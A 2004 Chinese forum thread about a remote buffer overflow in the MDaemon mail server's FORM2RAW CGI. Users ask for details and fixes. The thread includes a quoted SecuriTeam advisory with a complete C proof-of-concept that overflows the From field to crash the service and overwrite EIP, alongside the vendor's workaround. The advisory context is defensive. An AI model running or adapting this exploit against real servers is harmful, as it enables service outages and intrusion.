标题: MD6.8.5重大漏洞 [打印本页] 作者: badwrs2000 时间: 2004-3-29 13:45 标题: MD6.8.5重大漏洞 MD6.8.5(包括前几版~)有重大漏洞,可导致SMTP停止服务,精心构建的恶意代码可开启shell~作者: goxia 时间: 2004-3-29 13:48 标题: Re:MD6.8.5重大漏洞 给点详细的介绍啊作者: hiandy 时间: 2004-3-31 16:33 标题: Re:MD6.8.5重大漏洞 把相关资料贴出来吧。作者: samson-du 时间: 2004-3-31 23:36 标题: Re:MD6.8.5重大漏洞 版主! 我们应该如何补漏洞呢,详细说一下解决办法嘛!作者: chyangwa 时间: 2004-3-31 23:38 标题: Re:MD6.8.5重大漏洞 到底什么漏洞,怎么解决。 冠子卖得时间太长了点了吧 <img src="../leadbbsfile/UBBicon/em08.GIF" width=20 height=20 align=absmiddle border=0>作者: goxia 时间: 2004-4-1 09:41 标题: Re:MD6.8.5重大漏洞 真是的!不江湖作者: badwrs2000 时间: 2004-4-1 17:29 标题: Re:MD6.8.5重大漏洞 我的IMAIL板块人气不高~ 所以来MD窜窜门~<br>
<br>
如果你是IMAIL的问题,我一定“江湖”<br>
<br>
至于这个MD的漏洞确实是非常严重,如果你可以升级到7.0是最好的,<br>
<br> 作者: hiandy 时间: 2004-4-1 19:37 标题: Re:MD6.8.5重大漏洞 Title 1/1/2004 <br>
Remote Buffer Overflow in MDaemon (Raw Message Handler)<br>
<br><br>Summary <br>
"MDaemon offers a full range of mail server functionality. MDaemon protects your users from spam and viruses, provides full security, includes seamless web access to your email via WorldClient, remote administration, and much more!".<br>
FORM2RAW.exe is a CGI that allows users to send emails using the MDaemon via a web page. It processes the fields of an HTML form and creates a raw message file in the raw queue directory of MDaemon mail server. This file then will be processed and queued for delivery by MDaemon. An attacker can cause a buffer overflow in MDaemon by issuing a malformed CGI request to FORM2RAW.exe.<br>
<br><br>Details <br>
Vulnerable Systems:<br>* MDaemon 6.85 and prior to 6.52<br>
<br>
According to the Help file "By default, MDaemon 6.52 or higher will not send emails created by Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the MDaemon server. If you want to disable this behavior you can set the FromCheck=No in FORM2RAW.INI file".<br>
<br>
Sending more than 153 bytes in the "From" field to FROM2Raw.exe creates a raw file that when processed by MDaemon will cause a Stack buffer overflow. The EIP register will be overwritten when the From field length is 249 bytes.<br>
<br>
The FORM2RAW.exe is accessible on any default installation of WorlClient Web server (usually listening on port 3000).<br>
<br>
Exploit:<br>
#include <windows.h><br>
#include <stdio.h><br>
#include <winsock.h><br>
#pragma comment (lib,"ws2_32")<br>
#define RET 0x1dff160<br>
#define PORT 3000<br>
void main(int argc, char **argv)<br>
{<br>SOCKET s = 0;<br>WSADATA wsaData;<br>
<br>if(argc < 2)<br>{<br>fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \<br>
"\nUsage: %s <target ip> \n", argv[0]);<br><br>printf("%d",argc);<br>exit(0);<br>}<br>
<br>WSAStartup(MAKEWORD(2,0), &wsaData);<br>
<br>s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);<br>
<br>if(INVALID_SOCKET != s)<br>{<br>SOCKADDR_IN anAddr;<br>anAddr.sin_family = AF_INET;<br>anAddr.sin_port = htons(PORT);<br>anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);<br><br>if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))<br>{<br>static char buffer[500];<br>int i;<br>memset(buffer,0,sizeof(buffer));<br>strcpy(buffer,"get /form2raw.cgi?From=");<br>for(i=0;i<244;i++) {<br>
<br>strcat(buffer,"a");<br>}<br><br>strcat(buffer,"bbbb"); //Overwrites EIP<br>strcat(buffer,"c"); //One byte left after ESP :-(<br>strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");<br><br>send(s, buffer, strlen(buffer), 0);<br>printf("Exploit Sent.");<br><br>}<br>
<br>else printf("Error Connecting to The Target.\n");<br>closesocket(s);<br>}<br>
<br>WSACleanup();<br>
}<br>
<br>
Vendor Response (Patch):<br>
<br>
Robin Edwards Wrote: We have had a similar vulnerability report with Form2Raw and hope to release a patch soon. In the meantime it is easy to disable Form2Raw by following the instructions below:<br>
<br>
To disable FORM2RAW open the <br>
\MDaemon\WorldClient\WorldClient.ini file with Notepad and <br>
delete the following two lines:<br>
<br>
CgiBase2=/Form2Raw.cgi<br>
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe<br>
<br>
Afterward, restart WorldClient to register the change. <br> 作者: hiandy 时间: 2004-4-1 19:38 标题: Re:MD6.8.5重大漏洞 <a target=_blank href=http://www.securiteam.com/windowsntfocus/5ZP050ABPY.html>http://www.securiteam.com/windowsntfocus/5ZP050ABPY.html</a>作者: 伏小鹏 时间: 2004-4-4 15:51 标题: Re:MD6.8.5重大漏洞 To disable FORM2RAW open the <br>
\MDaemon\WorldClient\WorldClient.ini file with Notepad and <br>
delete the following two lines:<br>
<br>
CgiBase2=/Form2Raw.cgi<br>
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe<br>
<br>
Afterward, restart WorldClient to register the change. <br>
<br>
<br>
解决办法?是删除这2个文件吗?<br>
然后重新启动就可以了?<br>
<br>
7.0.1 没破戒成功.......只好用6.8.5作者: redneck 时间: 2004-4-4 16:43 标题: Re:MD6.8.5重大漏洞 我看到过的攻击代码是针对md6.85 at winxp平台的,针对2000和2003的攻击代码没有看到.<br>
我觉得大多数管理员可以暂时放心,很多script kids没有现成的工具不会攻击你的服务器的 :0作者: 钉子 时间: 2004-4-6 00:56 标题: Re:MD6.8.5重大漏洞 关注。。<br> 作者: zhouyihua 时间: 2004-5-13 12:53 标题: Re:MD6.8.5重大漏洞 如何解决呢?作者: 冷雨 时间: 2004-5-13 14:59 标题: Re:MD6.8.5重大漏洞 顶。。。。。。。。。作者: 顶着锅盖的士兵 时间: 2004-5-13 20:19 标题: Re:MD6.8.5重大漏洞 严重关注..............